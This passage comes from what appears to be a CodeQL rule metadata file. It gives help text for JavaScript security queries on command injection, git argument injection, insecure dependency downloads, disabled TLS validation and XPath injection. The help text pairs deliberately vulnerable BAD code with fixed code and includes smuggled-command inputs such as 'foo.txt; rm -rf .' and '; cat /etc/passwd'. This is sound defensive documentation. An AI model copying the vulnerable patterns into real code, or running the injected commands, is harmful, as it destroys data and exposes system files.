cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Building a shell command string with values from the enclosing\n              environment may cause subtle bugs or vulnerabilities.","id":"js/shell-command-injection-from-environment","kind":"path-problem","name":"Shell command built from environment values","precision":"high","problem.severity":"warning","security-severity":"6.3"}},{"id":"js/command-line-injection","name":"js/command-line-injection","shortDescription":{"text":"Uncontrolled command line"},"fullDescription":{"text":"Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url'),\n    shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n    let options = url.parse(req.url, true).query.options;\n\n    cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    // only allow safe characters in file name\n    if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n        cp.execSync(`wc -l ${file}`); // GOOD\n    }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url'),\n    shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n    let options = url.parse(req.url, true).query.options;\n\n    cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    http = require('http'),\n    url = require('url');\n\nvar server = http.createServer(function(req, res) {\n    let file = url.parse(req.url, true).query.path;\n\n    // only allow safe characters in file name\n    if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n        cp.execSync(`wc -l ${file}`); // GOOD\n    }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Using externally controlled strings in a command line may allow a malicious\n              user to change the meaning of the command.","id":"js/command-line-injection","kind":"path-problem","name":"Uncontrolled command line","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/shell-command-constructed-from-input","name":"js/shell-command-constructed-from-input","shortDescription":{"text":"Unsafe shell command constructed from library input"},"fullDescription":{"text":"Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n  cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Using externally controlled strings in a command line may allow a malicious\n              user to change the meaning of the command.","id":"js/shell-command-constructed-from-input","kind":"path-problem","name":"Unsafe shell command constructed from library input","precision":"high","problem.severity":"error","security-severity":"6.3"}},{"id":"js/unnecessary-use-of-cat","name":"js/unnecessary-use-of-cat","shortDescription":{"text":"Unnecessary use of `cat` process"},"fullDescription":{"text":"Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n    return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n    return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n","markdown":"# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n    return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n    return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n"},"properties":{"tags":["correctness","security","maintainability","external/cwe/cwe-078"],"description":"Using the  `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.","id":"js/unnecessary-use-of-cat","kind":"problem","name":"Unnecessary use of `cat` process","precision":"high","problem.severity":"error","security-severity":"6.3"}},{"id":"js/second-order-command-line-injection","name":"js/second-order-command-line-injection","shortDescription":{"text":"Second order command injection"},"fullDescription":{"text":"Using user-controlled data as arguments to some commands, such as git clone, can allow arbitrary commands to be executed."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n    throw new Error(\"Invalid remote: \" + remote);\n  }\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n  const remote = req.query.remote;\n  if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n    throw new Error(\"Invalid remote: \" + remote);\n  }\n  cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Using user-controlled data as arguments to some commands, such as git clone,\n              can allow arbitrary commands to be executed.","id":"js/second-order-command-line-injection","kind":"path-problem","name":"Second order command injection","precision":"high","problem.severity":"error","security-severity":"7.0"}},{"id":"js/insecure-dependency","name":"js/insecure-dependency","shortDescription":{"text":"Dependency download using unencrypted communication channel"},"fullDescription":{"text":"Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n","markdown":"# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n  \"name\": \"example-project\",\n  \"dependencies\": {\n    \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n    \"lodash\": \"^4.0.0\"\n  }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n"},"properties":{"tags":["security","external/cwe/cwe-300","external/cwe/cwe-319","external/cwe/cwe-494","external/cwe/cwe-829"],"description":"Using unencrypted protocols to fetch dependencies can leave an application\n              open to man-in-the-middle attacks.","id":"js/insecure-dependency","kind":"problem","name":"Dependency download using unencrypted communication channel","precision":"high","problem.severity":"warning","security-severity":"8.1"}},{"id":"js/disabling-certificate-validation","name":"js/disabling-certificate-validation","shortDescription":{"text":"Disabling certificate validation"},"fullDescription":{"text":"Disabling cryptographic certificate validation can cause security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n  {\n    hostname: \"secure.my-online-bank.com\",\n    port: 443,\n    method: \"POST\",\n    path: \"send-confidential-information\",\n    rejectUnauthorized: false // BAD\n  },\n  response => {\n    // ... communicate with secure.my-online-bank.com\n  }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n","markdown":"# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n  {\n    hostname: \"secure.my-online-bank.com\",\n    port: 443,\n    method: \"POST\",\n    path: \"send-confidential-information\",\n    rejectUnauthorized: false // BAD\n  },\n  response => {\n    // ... communicate with secure.my-online-bank.com\n  }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n"},"properties":{"tags":["security","external/cwe/cwe-295","external/cwe/cwe-297"],"description":"Disabling cryptographic certificate validation can cause security vulnerabilities.","id":"js/disabling-certificate-validation","kind":"problem","name":"Disabling certificate validation","precision":"very-high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/xpath-injection","name":"js/xpath-injection","shortDescription":{"text":"XPath injection"},"fullDescription":{"text":"Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // BAD: Use user-provided data directly in an XPath expression\n  let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n  badXPathExpr.select({\n    node: root\n  });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // GOOD: Embed user-provided data using variables\n  let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n  goodXPathExpr.select({\n    node: root,\n    variables: { userName: userName }\n  });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n","markdown":"# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // BAD: Use user-provided data directly in an XPath expression\n  let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n  badXPathExpr.select({\n    node: root\n  });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // GOOD: Embed user-provided data using variables\n  let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n  goodXPathExpr.select({\n    node: root,\n    variables: { userName: userName }\n  });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n"},"properties":{"tags":["security","external/cwe/cwe-643"],"description":"Building an XPath expression from user-controlled sources is vulnerable to insertion of\n              malicious code by the user.","id":"js/xpath-injection","kind":"path-problem","name":"XPath 